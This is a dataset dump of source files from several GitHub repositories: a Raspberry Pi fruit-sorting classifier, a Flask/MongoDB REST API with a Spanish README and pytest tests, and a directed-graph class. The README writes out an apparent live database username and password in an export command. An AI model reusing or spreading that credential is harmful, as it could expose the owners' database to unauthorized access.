"length_bytes": 3154,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 86,
"path": "/test.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "########################################################################################################\r\n################# Development of an embedded Vision Based Fruit Sorting Machine ########################\r\n################# BY: Clary Norman (ID: 2017141960) ########################\r\n########################################################################################################\r\nimport os\r\nfrom gpiozero import MotionSensor\r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nfrom picamera.array import PiRGBArray\r\nfrom picamera import PiCamera\r\nimport time\r\nimport RPi.GPIO as GPIO\r\n# servo motor\r\nGPIO.setmode(GPIO.BOARD)\r\nservoPin= 22\r\nGPIO.setmode(GPIO.BOARD)\r\nservoPin_1 = 24\r\n\r\ndesiredPosition1 = 0\r\ndesiredPosition2 = 75\r\ndesiredPosition3 = 180\r\ndesired_1 = 0\r\ndesired_2 = 75\r\ndesired_3 = 180\r\nGPIO.setup(servoPin,GPIO.OUT)\r\nGPIO.setup(servoPin_1,GPIO.OUT)\r\npwm=GPIO.PWM(servoPin,50)\r\npwm_1 =GPIO.PWM(servoPin_1,50)\r\n\r\npir = MotionSensor (24)\r\ncamera = PiCamera()\r\nprint(\"Developement of an Embeeded Vision Based Fruit Sorting Machine\")\r\nprint(\"By: Clary Norman (2017141960)\")\r\ntime.sleep(4)\r\nos.system('cls')\r\nprint(\"\")\r\nprint(\"PLace the fruit\")\r\nwhile True:\r\n if pir.wait_for_motion(): #object is near\r\n print(\"Fruit detected..\")\r\n rawCapture = PiRGBArray(camera)\r\n time.sleep(1)\r\n camera.capture(rawCapture,format = 'bgr')\r\n time.sleep(5)\r\n I = rawCapture.array\r\n from detectOrangeFunc import detectOrange\r\n [y,x,z,r] = detectOrange(I)\r\n\r\n from detectAppleFunc import detectApple\r\n [y1,x1,z1,t] = detectApple(I)\r\n\r\n ## Classification:\r\n print(\"\")\r\n print (\"number of pixels for orange: \")\r\n print (x)\r\n print (\"number of pixels for apple: \")\r\n print (x1)\r\n\r\n if x > 5:\r\n print(\"\")\r\n print(\"Orange\")\r\n show = cv2.cvtColor(I, cv2.COLOR_BGR2RGB)\r\n plt.imshow(show,cmap = 'gray')\r\n plt.show()\r\n pwm.start(7)\r\n DC = 1./15.*(desiredPosition1)+2\r\n pwm.ChangeDutyCycle(DC)\r\n time.sleep(2)\r\n DC = 1./15.*(desiredPosition3)+2\r\n pwm.ChangeDutyCycle(DC)\r\n elif x1 > 5:\r\n print(\"\")\r\n print(\"Apple\")\r\n plt.imshow(I,cmap = 'gray')\r\n plt.show()\r\n pwm_1.start(7)\r\n DC_1 = 1./15.*(desired_1)+2\r\n pwm_1.ChangeDutyCycle(DC_1)\r\n time.sleep(2)\r\n DC_1 = 1./15.*(desired_3)+2\r\n pwm_1.ChangeDutyCycle(DC_1)\r\n else: \r\n print('Unclassified fruit')\r\n if pir.wait_for_no_motion(): #object is far away\r\n print(\"\")\r\n print ('Place the fruit')"
},
{
"alpha_fraction": 0.37731871008872986,
"alphanum_fraction": 0.4443507492542267,
"avg_line_length": 41.05454635620117,
"blob_id": "5f2917b217a0ed23e7bf928fc178f845d60c62a7",
"content_id": "b81481620d1d5a456bb9913f762b6f469408ca69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2372,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 55,
"path": "/detectAppleFunc.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 29 21:25:27 2020\r\n######################################################################\r\n# Development Of an Embedded Vision Based Fruit Sorting Machine #####\r\n@author: CLARY NORMAN (2017141960) ####\r\n\"\"\" #####\r\n####################################################################\r\nimport numpy as np\r\nimport cv2 \r\n\r\ndef detectApple(I): \r\n # load or hard code your parameters here\r\n mu = np.array([167.978,76.6507,65.574])\r\n sigma = np.array([[1068.4,1003.08,640.939],[1003.08,1468.42,999.001],[640.939,999.001,784.846]])\r\n threshold = 2.13807e-8\r\n D = 3\r\n ########################################################################################################################\r\n # find the ball color pixel using your model\r\n ########################################################################################################################\r\n #output = cv2.resize(I, (400,400))\r\n im_rgb1 = cv2.cvtColor(I, cv2.COLOR_BGR2RGB)\r\n im_rgb = cv2.cvtColor(I, cv2.COLOR_BGR2HSV)\r\n #cv2.imshow('Origial Apple fruit',output)\r\n\r\n R = im_rgb1[:,:,0]\r\n G = im_rgb1[:,:,1]\r\n B = im_rgb1[:,:,2]\r\n\r\n S1 = np.zeros([50,50])\r\n\r\n for m in range(50):\r\n for n in range (50):\r\n r = R[m,n]\r\n g = G[m,n]\r\n b = B[m,n]\r\n x = np.double([r,g ,b])\r\n SIGMA_inv = np.linalg.inv(sigma)\r\n denominator = np.sqrt((2 * np.pi)**D * np.linalg.det(sigma))\r\n exponent = -(1/2) * ((x - mu).T @ SIGMA_inv @ (x - mu ))\r\n p = float((1. / denominator) * np.exp(exponent) ) \r\n if (p > threshold):\r\n S1[m,n] = True\r\n # Calculating the pixel of the Orange fruit \r\n pixels = cv2.countNonZero(S1) \r\n image_area = im_rgb1.shape[0] * im_rgb1.shape[1]\r\n area_ratio = (pixels / image_area) * 100 \r\n # apply morphological method to fill the holes\r\n kernel = np.ones((5,5),np.uint8)\r\n dilation = cv2.dilate(S1,kernel,iterations = 1)\r\n closing1 = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel) \r\n # covert binary image to its original image without the background\r\n mask = np.atleast_3d(closing1)\r\n red = np.uint8(mask)*I\r\n return red,area_ratio,closing1,I\r\n "
},
{
"alpha_fraction": 0.5954875349998474,
"alphanum_fraction": 0.6212731599807739,
"avg_line_length": 24.77083396911621,
"blob_id": "7a3062d5ac9fc3aea6acfa6818854f9f9b05f33a",
"content_id": "2d4a791baece6debc4a83e948cf6fabbe723b0aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 48,
"path": "/Camera_test_Binary.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 16 08:37:40 2020\n\n@author: pi\n\"\"\"\n\nfrom picamera import PiCamera\nfrom picamera.array import PiRGBArray\nimport time \nimport cv2\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import metrics\nfrom sklearn.svm import SVC\n\ncamera = PiCamera()\n\nfor i in range (50):\n #camera.capture(\"/home/pi/Desktop/newfile/\" + i + \".jpg\")\n rawCapture = PiRGBArray(camera)\n time.sleep(0.5)\n #t.start()\n camera.capture(rawCapture,format = 'bgr')\n I = rawCapture.array\n show = cv2.cvtColor(I, cv2.COLOR_BGR2RGB)\n I = cv2.resize(I, (50,50))\n from detectOrangeFunc import detectOrange\n [y,x,r,z] = detectOrange(I)\n\n from detectAppleFunc import detectApple\n [y1,x1,t,z1] = detectApple(I)\n\n # Classify whether apple or Orange\n if x >x1:\n print(\"Orange\")\n plt.imshow(show,cmap = 'gray')\n plt.show()\n\n elif x1 > x:\n print(\"Apple\")\n plt.imshow(show,cmap = 'gray')\n plt.show()\n\n\n\n "
}
] | 6 |
dclancy89/python_scores_and_grades | https://github.com/dclancy89/python_scores_and_grades | 6c3cdd8e3dcbf49b685e7d960171bf4b5df84607 | bb7df7d88172c256d87dbf3d98d9267cc814bf6d | 75a6cfd889919942ea59fc5345cfe836b387706e | refs/heads/master | 2021-04-29T17:49:53.657865 | 2018-02-15T20:19:29 | 2018-02-15T20:19:29 | 121,678,172 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5642201900482178,
"alphanum_fraction": 0.5940366983413696,
"avg_line_length": 23.22222137451172,
"blob_id": "a94f1c20efe885712a547164b64769bb96470e17",
"content_id": "4d244a008576f198872436a74495452e825f203b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 18,
"path": "/scores_and_grades.py",
"repo_name": "dclancy89/python_scores_and_grades",
"src_encoding": "UTF-8",
"text": "import random\n\ndef grade():\n\tprint \"Scores and Grades\"\n\tfor x in range(11):\n\t\tgrade = random.randint(60, 100)\n\t\tif grade < 70 :\n\t\t\tprint \"Score: \" + str(grade) + \"; Your grade is D\"\n\t\telif grade < 80 :\n\t\t\tprint \"Score: \" + str(grade) + \"; Your grade is C\"\n\t\telif grade < 90 :\n\t\t\tprint \"Score: \" + str(grade) + \"; Your grade is B\"\n\t\telse:\n\t\t\tprint \"Score: \" + str(grade) + \"; Your grade is A\"\n\tprint \"End of the program. Bye!\"\n\n\ngrade()\n"
}
] | 1 |
garzuzo/sd-midterm2 | https://github.com/garzuzo/sd-midterm2 | 003cc14ce4ed17ab42140f3602e094b9c9536c7e | 8160ad35622e4658121cae41fa66ffeb4b8a6c1d | fe732eac957a755414868d9ffd689a7e33917782 | refs/heads/master | 2020-09-09T17:53:00.735274 | 2019-11-16T06:20:29 | 2019-11-16T06:20:29 | 221,517,559 | 0 | 0 | MIT | 2019-11-13T17:42:15 | 2019-11-15T21:10:56 | 2019-11-16T05:43:42 | Python | [
{
"alpha_fraction": 0.7091404795646667,
"alphanum_fraction": 0.7206199169158936,
"avg_line_length": 46.57143020629883,
"blob_id": "afe8eb578d8f1d2192057e0a8ebacc541a45fa11",
"content_id": "f6cab6fe13b9b63fec549804bc93ff10e9e0f99d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14054,
"license_type": "permissive",
"max_line_length": 824,
"num_lines": 287,
"path": "/README.md",
"repo_name": "garzuzo/sd-midterm2",
"src_encoding": "UTF-8",
"text": "# Exam 2 \r\n\r\n**Universidad ICESI** \r\n**Course:** Distributed systems \r\n**Teacher:** Juan M Álvarez Q. \r\n**Topic:** Microservices Architecture design \r\n**email:** juan.alvarez8 at correo.icesi.edu.co\r\n\r\n### Learning goals\r\n* Design a microservices architecture application\r\n\r\n### Suggested technologies for the midterm development\r\n* [Open API](https://openapi.tools/)\r\n* github repository\r\n* Flask and [connexion](https://connexion.readthedocs.io/en/latest/)\r\n* Mongo db and [mlab](https://mlab.com/)\r\n* [travis-ci](https://travis-ci.org/)\r\n\r\n### Description\r\n\r\nFor this exam you should redesing the application developed in midterm 1 into a REST-based microservices arquitecture. your aplication must comply the following:\r\n\r\n* Must have a github repository which is a fork of the **[sd-mdterm2](https://github.com/ICESI-Training/sd-midterm2)** repository\r\n* It is suggested to use mlab for data storage: mlab is a database as a service provider for mongo databases.\r\n* The system must accept Http requests from cURL (you can use other REST clients like postman, insomnia or postwoman.\r\n* The application must have an endpoint to insert data in the database.\r\n* The application must have an endpoint to retrieve all the registers from a database collection or table.\r\n* The design must have continous integration unit tests for all microservices.\r\n\r\n\r\n### Actividades (EN español para evitar ambigüedades)\r\n1. Documento README.md en formato markdown: \r\n * Formato markdown (5%).\r\n * Nombre y código del estudiante (5%).\r\n * Ortografía y redacción (5%).\r\n2. Documentación de la API de conformidad con el estándar [OpenAPI](https://github.com/OAI/OpenAPI-Specification). (15%)\r\n3. Pruebas unitarias de cada microservicio para el proceso de integración contínua (10%). Evidencia del código pasando dichas pruebas(5%).\r\n4. Archivos fuentes en el repositorio de los microservicios implementados (15%).\r\n5. Documentación de las tareas para desplegar los microservicios en una máquina local (10%). Evidencias del despliegue (peticiones cURL o similares)(10%).\r\n6. El informe debe publicarse en un repositorio de github el cual debe ser un fork de https://github.com/ICESI-Training/sd-midterm2 y para la entrega deberá hacer un Pull Request (PR) al upstream (10%). Tenga en cuenta que el repositorio debe contener todos los archivos necesarios para el despliegue.\r\n7. Documente algunos de los problemas encontrados y las acciones efectuadas para su solución (10%).\r\n\r\n\r\n**Integrantes:** Johan Camilo Diaz A00329772 \r\n**Integrantes:** Johnatan Garzón A00333960\r\n\r\n\r\n### Evidencia de la API de conformidad con el estándar OpenAPI\r\n\r\n\r\n##### GET\r\n\r\n\r\n>El método post en OpenAPI posee el campo de ingreso de parametros (los parametros id y name) además del significado de las posibles status code que se pueden obtener al realizar una petición, entre estos códigos se encuentran el 201 que representa una creación exitosa de un usuario en la base de datos, el código 400 que representa una bad request es decir que los parámetros enviados en la petición no son pertinentes para la operación a realizar, y el código 402 que se presenta cuando el id del usuario que se desea agregar a la base de datos ya existe.\r\n\r\n```yaml\r\n get:\r\n summary: Extraer la información\r\n description: Se extrae información todos los usuarios de la base de datos.\r\n operationId: app.read_user\r\n responses:\r\n 200:\r\n description: Datos obtenidos con éxito\r\n content:\r\n text/plain:\r\n schema:\r\n type: string\r\n example: '[{\"_id\": {\"$oid\": \"5dcb7fc020f273c7abeb0a7b\"}, \"id\": \"1\", \"name\": \"Johnatan\"}]'\r\n\r\n\r\n```\r\nEn el código YAML para la definición del método GET se cuenta con la descripción correspondiente donde se deja en claro qué función cumple este método, además se define el operationId que es un componente muy importante en la descripción del método ya que en este campo se especifica la dirección de la operación que se va a invocar cada vez que se realice una petición bajo la modalidad GET al path escrito (/users). En este caso la operación invocada se encuentra en la *app.py* y se llama *read_user*.\r\n\r\n\r\n\r\n\r\n##### POST\r\n\r\n\r\n>El método get por su parte posee solamente el significado de su status code 200 que se presenta cuando los datos se han obtenido de manera correcta, en adición a eso, también posee un ejemplo de cómo se vería el mensaje de respuesta de la petición.\r\n\r\n\r\n```yaml\r\n post:\r\n summary: Crear un usuario\r\n description: Crea un usuario en base a los datos de id y nombre ingresados por parametro.\r\n operationId: app.create_user\r\n requestBody:\r\n description: Usuario a crear en la base de datos\r\n required: true\r\n content:\r\n application/x-www-form-urlencoded:\r\n schema:\r\n $ref: '#/components/schemas/NewUser'\r\n responses:\r\n 201:\r\n description: Usuario creado con exito\r\n 400:\r\n description: Bad request\r\n 402:\r\n description: El usuario ya existe\r\n\r\n\r\ncomponents:\r\n schemas:\r\n NewUser:\r\n type: object\r\n properties:\r\n id: \r\n type: string\r\n name: \r\n type: string\r\n```\r\nPara las peticiones de tipo POST se define que cada vez que se reciba una solicitud se invoque la operación create_user que pertenece al módulo *app.py* que se encuentra en la carpeta *backend*. En este método se especifica un requestBody donde se plantea que el parámetro que será transmitido es de tipo **x-www-form-urlencoded** y que seguirá un esquema llamado *NewUser* definido en el apartado de *components*, el cual especifíca los parametros, el tipo y el nombre de los mismos, que se encuentran en el requestBody.\r\n\r\n\r\n\r\n##### DELETE\r\n\r\n\r\n>El método delete presenta dos status code, el código 204 simboliza que un usuario ha sido eliminado de la base de datos de forma correcta y el código 404 simboliza que el id del usuario que se pretendía borrar no existe. En adición a esto se puede apreciar que el método delete posee una ruta especial definida como /user/{id del usuario que se desea borrar} y que el id es reconocido como parámetro para la posterior eliminación del usuario que posea ese identificador.\r\n\r\n```yaml\r\n /users/{id}:\r\n delete:\r\n summary: Eliminar usuario\r\n description: Se elimina el usuario de la base de datos.\r\n operationId: app.delete_user\r\n parameters:\r\n - name: id\r\n in: path\r\n description: Identificador del usuario a eliminar\r\n required: true\r\n schema:\r\n type: string\r\n responses:\r\n 204:\r\n description: Usuario removido con éxito\r\n 404:\r\n description: El usuario no existe\r\n```\r\nEn este método se hace uso de un path diferente que cuenta con el id del usuario a eliminar, es decir, el path tiene la siguiente estructura “/users/id” donde id corresponde al usuario del que se desea prescindir. Dentro del código YAML se especifica de qué tipo debe ser este dato, para nuestro caso se decidió que el dato debe ser tipo String.\r\n\r\n### Evidencia de pruebas unitarias de cada microservicio para el proceso de integración continua\r\n\r\nPrueba para obtener todos los usuarios\r\n\r\n```python\r\ndef test_valid_read_clients(client):\r\n response = client.get('/users')\r\n assert response.status_code == 200\r\n```\r\n\r\nPrueba de un endpoint inválido, en este caso obtener un usuario en específico no está implementado por lo que debería retornar un status code igual a 405:\r\n```python\r\ndef test_invalid_endpoint_read_clients(client):\r\n response = client.get('/users/32')\r\n assert response.status_code == 405\r\n```\r\n\r\nPrueba válida de creación de un nuevo usuario. Se crea un nuevo usuario, el cúal al crear retorna un status code igual a 201, y luego es eliminado para no interferir con futuras pruebas y retorna un status code igual a 204:\r\n```python\r\ndef test_valid_create_clients(client):\r\n \r\n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\r\n \"Accept\": \"application/json\"} \r\n response = client.post('/users', data=dict(id='abc12345', name='Marshmillow'), headers=header)\r\n \r\n assert response.status_code == 201\r\n response_remove=client.delete('/users/abc12345')\r\n assert response_remove.status_code == 204\r\n```\r\n\r\n\r\nPrueba para verificar que la eliminación de usuarios que no existen retornen un 404:\r\n```python\r\ndef test_delete_clients_unavailable(client):\r\n response_remove=client.delete('/users/juanmaid')\r\n assert response_remove.status_code == 404\r\n```\r\n\r\n\r\nPrueba para verificar que no se cree un usuario que existía previamente, es decir, que retorne un status code igual a 402:\r\n```python\r\ndef test_invalid_create_clients(client):\r\n \r\n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\r\n \"Accept\": \"application/json\"}\r\n\r\n response = client.post('/users', data=dict(id='1', name='Marshmillo'), headers=header)\r\n \r\n assert response.status_code == 402\r\n \r\n```\r\n\r\n\r\nPrueba para verificar que retorne un status code igual a 400 cuando se envíe un body incorrecto en la creación de un nuevo usuario:\r\n```python\r\ndef test_invalid_body_req_create_clients(client):\r\n \r\n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\r\n \"Accept\": \"application/json\"}\r\n\r\n response = client.post('/users', data=dict(id='bcc21912', names='Marshmillo'), headers=header)\r\n \r\n assert response.status_code == 400\r\n```\r\n\r\n\r\n\r\n\r\n\r\n\r\n### Evidencia del código pasando dichas pruebas\r\nPara correr las pruebas de manera **local** se usa el comando:\r\n```sh\r\n$ pytest tests/test_app.py\r\n```\r\nPodemos observar el resultado exitoso de las seis pruebas implementadas:\r\n\r\n\r\n\r\nAhora, observamos el resultado de la ejecución de las pruebas en **travis CI**:\r\n\r\n\r\n\r\n\r\nObservamos como se carga primero la variable de entorno **MONGO_FLASK**, y luego se encarga de instalar los requerimientos indicados en **requirements.txt**, y por último ejecuta las pruebas, dando como resultado seis pruebas exitosas:\r\n\r\n\r\n\r\n\r\n\r\n\r\n### Tareas para desplegar los microservicios en una máquina local\r\n\r\nLas tareas que se deben llevar a cabo son:\r\n\r\n1. Se deben instalar los requerimientos necesarios que se encuentran en *requirements.txt*\r\n2. Se exporta la variable de entorno *MONGO_FLASK* que contiene las credenciales para conectarse con la base de datos remota\r\n3. Ejecutar la aplicación *app.py* que se encuentra en la carpeta *backend*\r\n```sh\r\n$ pip install -r requirements.txt\r\n$ export MONGO_FLASK=d_user:distribuidos20192\r\n$ python3 backend/app.py\r\n```\r\n\r\n\r\n### Evidencias del despliegue\r\n\r\nAhora, se puede observar las respuestas correctas por parte de cada uno de los endpoints implementados.\r\n\r\nObtener todos los usuarios:\r\n\r\n\r\n\r\nAgregamos un nuevo usuario:\r\n\r\n\r\n\r\n\r\nObtenemos de nuevo la lista con todos los usuarios para ver el nuevo usuario agregado:\r\n\r\n\r\n\r\nEliminamos un usuario\r\n\r\n\r\n\r\n### Problemas encontrados y acciones efectuadas para su solución\r\n\r\n\r\n- Se presentaron inconvenientes en el entendimiento de la integración de openapi con nuestra aplicación en Flask. Con el tiempo fuimos comprendiendo que lo indicado en el archivo .yaml de openapi y sus endpoints estaban ligados a cada método correspondiente, que depende del tipo de petición y la ruta.\r\n \r\n- Tuvimos problemas al importar la app.py que está en la carpeta backend en el archivo de pruebas (test_app.py), ya que al principio estabamos usando tres puntos (...) para llegar a la carpeta padre que contenía dicha carpeta. Esto resultó en errores, que primeramente solucionamos importando la libreria imp, que nos permitía importar un módulo dada una ruta, sin embargo, esta librería estaba deprecada. Por lo tanto, para solucionar esto buscamos otra librería equivalente llamada importlib, la cual, mediante el modulo machinery permite realizar la tarea requerida que se mencionó anteriormente.\r\n \r\n- Otro problema tenía que ver con la variable de entorno utilizada para guardar las credenciales de ingreso a la base de datos remota, esto debido a que no hallabamos una forma clara de cargar esta variable en travis CI, primero intentamos cargar la variable directamente en la plataforma de travis CI, pero al momento de hacer el pull request obteniamos un error, ya que la variable solo se encontraba en nuestro repositorio, por lo que pensamos en pasar la variable encriptada en el archivo .travis.yml, lo que permitiría ser usada en cualquier otro repositorio. Sin embargo, siguió fallando, y llegamos a la conclusión junto al profesor de que la configuración del travis en el repositorio original (al que se le debía hacer el pull request), no contaba con los permisos necesarios para hacer uso de variables de entorno.\r\n\r\n\r\n\r\n>En una vista más detallada, se puede observar el error de pymongo al no poder obtener las credenciales de autenticación para la conexión con mlab:\r\n\r\n\r\n\r\n\r\n\r\n- Por último, un problema por el que no se realizaban las peticiones HTTP en el ui de openapi, era porque estábamos accediendo desde otro origen al servidor, por lo tanto teníamos que permitir el acceso desde otros orígenes, es decir: activamos el Cross-Origin Resource Sharing (CORS), esto mediante un decorator de la librería flask_cors (@cross_origin(origin='*'))"
},
{
"alpha_fraction": 0.8552631735801697,
"alphanum_fraction": 0.8552631735801697,
"avg_line_length": 8.625,
"blob_id": "677b2b214416491fb10e2ccc7517e22a53bdea40",
"content_id": "aa3935d226e34327d37f0d5442cccca15f3fc0c0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 76,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "garzuzo/sd-midterm2",
"src_encoding": "UTF-8",
"text": "bson\nflask_pymongo\ndnspython\nflask\nconnexion\npytest\nflask_cors\nswagger-ui-py"
},
{
"alpha_fraction": 0.643056333065033,
"alphanum_fraction": 0.6581149101257324,
"avg_line_length": 24.542856216430664,
"blob_id": "f053a2aab2da989114312f701462fb14159454a5",
"content_id": "01a8be9bcf50ac351d3dcbc18a37abfd722007df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1793,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 70,
"path": "/backend/app.py",
"repo_name": "garzuzo/sd-midterm2",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, flash, render_template, jsonify,json\nimport connexion\nfrom flask_pymongo import pymongo\nfrom bson.json_util import dumps\nimport os\nfrom flask_cors import CORS, cross_origin\napp = connexion.FlaskApp(__name__, specification_dir='../openapi/')\nurl_mongo=\"mongodb+srv://\"+str(os.environ.get('MONGO_FLASK'))+\"@distribuidos-7a22s.mongodb.net/test?retryWrites=true&w=majority\"\nclient = pymongo.MongoClient(url_mongo)\ndb = client.ds_db\n\n\n\n#app.run(port=8080)\n\napi_url = '/api'\n\[email protected](api_url+'/users', methods=['GET'])\n@cross_origin(origin='*')\ndef read_user():\n users=db.Users.find({})\n #print(dumps(list(users)))\n res=dumps(list(users))\n return res\n\n\[email protected](api_url+'/users/<string:id>', methods=['DELETE'])\n@cross_origin(origin='*')\ndef delete_user(id):\n answ=db.Users.delete_one({'id':id}).deleted_count\n if answ==0 :\n resp = jsonify('User does not exist')\n resp.status_code = 404\n return resp\n else :\n resp = jsonify('User removed successfully!')\n resp.status_code = 204\n return resp\n\n\n\n\[email protected](api_url+'/users', methods=['POST'])\n@cross_origin(origin='*')\ndef create_user():\n\n\n id=request.form['id']\n name=request.form['name']\n \n if id and name and request.method == \"POST\" :\n users=db.Users.find_one({'id':id})\n if users is not None:\n resp = jsonify('User already exists')\n resp.status_code = 402\n return resp\n else:\n db.Users.insert_one({'id': id, 'name':name})\n resp = jsonify('User added successfully!')\n resp.status_code = 201\n return resp\n else :\n resp = jsonify('Bad Request')\n resp.status_code = 400\n return resp\n\nif __name__ == \"__main__\":\n app.add_api('my_api.yaml', resolver=connexion.RestyResolver('api'))\n\n app.run(port=3000, debug=True)\n \n"
},
{
"alpha_fraction": 0.6354312300682068,
"alphanum_fraction": 0.6536130309104919,
"avg_line_length": 27.105262756347656,
"blob_id": "6c09286464f9415806b2391a0d745d25cccceed1",
"content_id": "9afb2186ab6d1e3dccb4b5b45be54ee58ddb77a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2145,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 76,
"path": "/tests/test_app.py",
"repo_name": "garzuzo/sd-midterm2",
"src_encoding": "UTF-8",
"text": "import pytest\nimport connexion\nimport os\nfrom flask import Flask, request, flash, render_template, jsonify,json\nfrom flask_pymongo import pymongo\nfrom bson.json_util import dumps\nimport importlib.machinery\n\nloader = importlib.machinery.SourceFileLoader('app','backend/app.py')\napp = loader.load_module()\n\n\nflask_app = connexion.FlaskApp(__name__, specification_dir='../openapi/')\nflask_app.add_api('my_api.yaml', resolver=connexion.RestyResolver('api'))\n\n#app = connexion.FlaskApp(__name__, specification_dir='openapi/')\n\[email protected](scope='module')\ndef client():\n with flask_app.app.test_client() as c:\n yield c\n\n\n\n\n\ndef test_valid_read_clients(client):\n \n response = client.get('/users')\n assert response.status_code == 200\n \n\n\n\ndef test_invalid_endpoint_read_clients(client):\n \n response = client.get('/users/32')\n assert response.status_code == 405\n \n\n\n\ndef test_valid_create_clients(client):\n \n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"} \n response = client.post('/users', data=dict(id='abc12345', name='Marshmillow'), headers=header)\n \n assert response.status_code == 201\n response_remove=client.delete('/users/abc12345')\n assert response_remove.status_code == 204\n\n\n\ndef test_delete_clients_unavailable(client):\n response_remove=client.delete('/users/juanmaid')\n assert response_remove.status_code == 404\n\n\ndef test_invalid_create_clients(client):\n \n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"}\n\n response = client.post('/users', data=dict(id='1', name='Marshmillo'), headers=header)\n \n assert response.status_code == 402\n \ndef test_invalid_body_req_create_clients(client):\n \n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"}\n\n response = client.post('/users', data=dict(id='bcc21912', names='Marshmillo'), headers=header)\n \n assert response.status_code == 400\n \n "
}
] | 4 |
bizzk3t/Graph | https://github.com/bizzk3t/Graph | 0c307d5cef1d4a2044d1cb8a03d3fb7d8a21b04b | 0d3a6a7dc6db8bd96a561b33adfd9cb45a2e5a21 | 5d091b23af0bc057524e6e4bafa6192be4713ce1 | refs/heads/master | 2020-04-06T06:54:38.785908 | 2014-05-06T08:12:59 | 2014-05-06T08:12:59 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5773584842681885,
"alphanum_fraction": 0.5828092098236084,
"avg_line_length": 15.534722328186035,
"blob_id": "15d1eecf11413833863e95428774681b187f62d2",
"content_id": "d742cb596f5b10def7fe866287d2266c73512dd9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2385,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 144,
"path": "/DGraph.py",
"repo_name": "bizzk3t/Graph",
"src_encoding": "UTF-8",
"text": "\nfrom collections import deque\n\n\nclass DGraph:\n\tdef __init__(self, d):\n\t\tself.adjlist = d\n\t\tself.genEdgeSet()\n\n\tdef genEdgeSet(self):\n\t\tself.edges = set()\n\t\tfor u in self.adjlist:\n\t\t\tfor v in self.adjlist[u]:\n\t\t\t\tself.edges.add((u,v)) \n\t\n\tdef addNode(self,label):\n\t\tself.adjlist[label] = {}\n\n\tdef addEdge(self, u, v, wt):\n\t\tif (u in self.adjlist and v in self.adjlist):\n\t\t\tself.adjlist[u][v] = wt\n\t\t\tself.edges.add((u,v))\n\n\tdef removeEdge(self, u, v):\n\t\tself.adjlist[u].pop(v, None)\n\t\tif ((u,v) in self.edges):\t\n\t\t\tself.edges.remove((u,v))\n\n\tdef getEdgeWt(self, u, v):\n\t\treturn self.adjlist[u][v]\n\n\tdef getNeighbors(self, u):\n\t\treturn self.adjlist[u].keys()\n\n\tdef getEdgeSet(self):\n\t\treturn self.edges\n\n\tdef getNodeSet(self):\n\t\treturn self.adjlist.keys()\n\t\n\tdef __repr__(self):\n\t\treturn str(self.adjlist)\n\n\n\tdef drawDOT(self):\n\t\tthenodes = self.getNodeSet()\n\t\ti = 0\n\t\tnodes = {}\n\t\tfor u in thenodes:\n\t\t\tnodes[str(u)]='a_'+str(i)\n\t\t\ti = i+1\n\t\t\n\n\t\tprint \"digraph mygraph {\"\n\t\tfor n in nodes.keys():\n\t\t\tprint nodes[n] + ' [label=\"' + n + '\"]'\n\n\n\t\tfor e in self.getEdgeSet(): \n\t\t\t(u,v) = e \n\t\t\tprint nodes[str(u)] + ' -> ' + nodes[str(v)] + ' [label=\"' + str(self.getEdgeWt(u,v)) + '\"]'\n\t\tprint '}'\n\n\n\n\n\n\tdef __getitem__(self, key):\n\t\treturn self.adjlist[key]\n\n\tdef reachable_from(self, u):\n\t\t# return set of nodes reachable from u. \n\t\tpass\n\n\t# BOOM\n\tdef dfs(self, visited):\n\t\tself.clock = 0\n\t\tfor v in self.getNodeSet():\n\t\t\tvisited[v] = False\n\t\n\t\tfor v in self.getNodeSet():\n\t\t\tif (not visited[v]):\n\t\t\t\tself.explore(v, visited)\n\t\t\t\n\n\tdef explore(self, u, visited):\n\t\tvisited[u] = {} \n\t\tself.previsit(u, visited)\n\t\tfor v in self.getNeighbors(u):\n\t\t\tif (not visited[v]):\n\t\t\t\tself.explore(v, visited)\n\t\tself.postvisit(u, visited)\n\n\tdef previsit(self, u, visited):\n\t\tvisited[u]['pre'] = self.clock\n\t\tself.clock += 1\n\n\n\n\tdef postvisit(self, u, visited):\n\t\tvisited[u]['post'] = self.clock\n\t\tself.clock += 1\n\n\t# 